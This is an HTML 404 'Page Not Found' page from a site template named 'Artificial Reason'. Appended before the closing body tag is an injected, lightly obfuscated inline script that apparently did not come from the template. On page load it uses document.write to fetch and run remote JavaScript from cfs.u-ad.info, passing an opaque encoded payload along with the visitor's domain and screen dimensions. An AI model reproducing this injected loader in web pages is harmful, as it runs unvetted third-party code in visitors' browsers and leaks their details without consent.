
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">

    <title>Artificial Reason</title>

    <link rel="shortcut icon" href="assets/img/favicon.png" />

    <meta name="description" content="">

    <!-- CSS -->
    <link href="assets/css/preload.css" rel="stylesheet">
    
    <!-- Compiled in vendors.js -->
    <!--
    <link href="assets/css/bootstrap.min.css" rel="stylesheet">
    <link href="assets/css/bootstrap-switch.min.css" rel="stylesheet">
    <link href="assets/css/font-awesome.min.css" rel="stylesheet">
    <link href="assets/css/animate.min.css" rel="stylesheet">
    <link href="assets/css/slidebars.min.css" rel="stylesheet">
    <link href="assets/css/lightbox.css" rel="stylesheet">
    <link href="assets/css/jquery.bxslider.css" rel="stylesheet" />
    <link href="assets/css/buttons.css" rel="stylesheet">
    -->

    <link href="assets/css/vendors.css" rel="stylesheet">
    <link href="assets/css/syntaxhighlighter/shCore.css" rel="stylesheet" >

    <link href="assets/css/style-blue.css" rel="stylesheet" title="default">
    <link href="assets/css/width-full.css" rel="stylesheet" title="default">

    

    <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
        <script src="assets/js/html5shiv.min.js"></script>
        <script src="assets/js/respond.min.js"></script>
    <![endif]-->
</head>

<!-- Preloader -->
<div id="preloader">
    <div id="status">&nbsp;</div>
</div>

<body>


<div class="paper-back">
    <div class="absolute-center">
        <div class="text-center">
            <div class="title-logo animated fadeInDown animation-delay-5">artificial<span>reason</span></div>
            <div class="transparent-div animated fadeInUp animation-delay-8">
                <h1>Error 404</h1>
                <h2>Page Not Found</h2>
                <p>We have not found what you are looking for. <br> We have put our robots to search.</p>
                <a href="index.html" class="btn btn-ar btn-primary btn-lg">Go Home</a>
            </div>
        </div>
    </div>
</div>


<!-- Scripts -->
<!-- Compiled in vendors.js -->
<!--
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.cookie.js"></script>
<script src="assets/js/imagesloaded.pkgd.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/bootstrap-switch.min.js"></script>
<script src="assets/js/wow.min.js"></script>
<script src="assets/js/slidebars.min.js"></script>
<script src="assets/js/jquery.bxslider.min.js"></script>
<script src="assets/js/holder.js"></script>
<script src="assets/js/buttons.js"></script>
<script src="assets/js/jquery.mixitup.min.js"></script>
<script src="assets/js/circles.min.js"></script>
<script src="assets/js/masonry.pkgd.min.js"></script>
<script src="assets/js/jquery.matchHeight-min.js"></script>
-->

<script src="assets/js/vendors.js"></script>

<script src="assets/js/styleswitcher.js"></script>

<!-- Syntaxhighlighter -->
<script src="assets/js/syntaxhighlighter/shCore.js"></script>
<script src="assets/js/syntaxhighlighter/shBrushXml.js"></script>
<script src="assets/js/syntaxhighlighter/shBrushJScript.js"></script>

<script src="assets/js/app.js"></script>

<script type="text/javascript">if(self==top){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);document.write("<scr"+"ipt type=text/javascript src="+idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request");document.write("?id=1");document.write("&amp;enc=telkom3");document.write("&amp;params=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlR6kOp54gN%2fVm0asQHjDnRJXhdcvp7DCZC9cC%2bp8UwsgfOwvsRZXvTVLVyrrJrzF%2frH9pDi3GjjLGKQa%2fqfPg2cXtUg7dmN0fvziXF8%2bODVfYhKPFCXlA0FNJYkXgheO6DdyLgnYIFV4g9t4C6iuWZhp65POBIap%2fxbFlucUet1pGo5i%2b%2fJzo49Ms%2bHwuAJ9AV5Y3p7xwQhm7Npfe5vZwhmyF%2feuBLGDfnLAyekiUntvFk1cYzh2clxuSajBOlCI5LVRE5jGYZSIHehgS%2fZk9MIXylU2vu%2bK%2b47AUg0jFB7PbbhwJoviueMmRnm9nhBue0uYHxxbDuol0d0pCRa3ENCzLs0b4PsD8CaOlaZCm9r3Y3CoSwCRhZPo5MsmoG6I1ZEigknZpYMw9NNTYylXY%2bWACqxUvNLbUCoe3RBdGDnkMxtHdQaaB%2fsd6dBuy%2foe5N%2beqtSU5Q43GrqAKtrZKBYMjPPq1s395YbsYJfRbXBX4SEDSJ6Fcz8lbHdb%2fCuW5%2fazucf0P2ZMIqE6x%2f%2bMIhYwkgHOvLKOsw1pek33ak%2bHHurdSuHXXyLFST17sRVPYP2x7D0NFU4ZWiLIM856OMVg%3d%3d");document.write("&amp;idc_r="+idc_glo_r);document.write("&amp;domain="+document.domain);document.write("&amp;sw="+screen.width+"&amp;sh="+screen.height);document.write("></scr"+"ipt>");}</script><noscript>activate javascript</noscript></body></body>

</html>
